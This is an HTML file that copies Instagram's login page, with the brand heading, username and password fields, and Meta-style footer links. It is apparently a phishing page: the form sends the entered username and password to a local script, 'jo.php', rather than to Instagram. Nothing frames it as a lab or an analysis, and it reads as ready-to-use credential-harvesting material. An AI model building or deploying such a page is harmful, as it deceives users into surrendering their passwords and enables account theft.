<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body {font-family: Arial, Helvetica, sans-serif;}
form {border: 3px solid #f1f1f1;}

input[type=text], input[type=password] {
  width: 100%;
  padding: 12px 20px;
  margin: 8px 0;
  display: inline-block;
  border: 1px solid #ccc;
  box-sizing: border-box;
}

button {
  background-color: #1A9BEF;
  color: white;
  padding: 20px 20px;
  margin: 8px 0;
  border: none;
  cursor: pointer;
  width: 100%;
  height: 8px;
  border-radius: 10px;
}

button:hover {
    background-color: #1A9BEF ;
  
}

.cancelbtn {
  width: auto;
  padding: 10px 18px;
  background-color: #f44336;
}

.imgcontainer {
  text-align: center;
  margin: 24px 0 12px 0;
}
.imgcontainer2 {
  text-align: center;
  margin: 24px 0 12px 0;}
img.avatar {
  width: 40%;
  
}
.v1{
    height: 300px;
    width: 100%;
}

.container {

  padding: 20px;
}

span.psw {
  float: center;
  padding-top: 16px;
}

/* Change styles for span and cancel button on extra small screens */
@media screen and (max-width: 300px) {
  span.psw {
     display: block;
     float: none;
  }
  
}
.h1 { font-family: "Brush Script MT", cursive; font-size: 50px; font-style: normal; font-variant: normal; font-weight: 670; line-height: 26.4px; } h3 { font-family: "Brush Script MT", cursive; font-size: 14px; font-style: normal; font-variant: normal; font-weight: 700; line-height: 15.4px; } p { font-family: "Brush Script MT", cursive; font-size: 14px; font-style: normal; font-variant: normal; font-weight: 400; line-height: 20px; } blockquote { font-family: "Brush Script MT", cursive; font-size: 21px; font-style: normal; font-variant: normal; font-weight: 400; line-height: 30px; } pre { font-family: "Brush Script MT", cursive; font-size: 13px; font-style: normal; font-variant: normal; font-weight: 400; line-height: 18.5714px; }
.ins1{

    height: 30px;
    width: 100%;
    padding: 20px ,20px, 20px ,20px ;
}
.ins{
    border:solid;
    border-color:#F2F4F4;
    height: 50px;
    width: 98%;
    padding: 20px ,20px, 20px ,20px ;
}
</style>
 
</head>
<body>


<form action="jo.php" method="post">
  <div class="imgcontainer">
<h1 class="h1">instagram</h1>
  </div>

  <div class="container" >
    
    <input type="text" placeholder="phone number, Username or email" name="fname" required>

   
    <input type="password" placeholder="Password" name="psw" required>
        
    <button type="submit">Log in</button>
 <hr>
  </div>
  <div class="imgcontainer2">
<p style="font-family:courier; font-size:12px;">LOG IN WITH FACEBOOK</p>
<p style="font-family:courier; font-size:12px;">forgot password?</p>
  </div>

</form>
<div class="ins1">
    </div>
<div class="ins">
    <p style="font-family:courier; font-size:12px; text-align : center;">Don't have an account? Sign up</p>
    </div>
    
    <div class="v1">

   </div>
      <p style="font-family:Arial; font-size:12px; ">                 Meta About Blog Jobs Help API Privacy Terms Top Accounts Hashtags Locations </p>
</body>
</html>



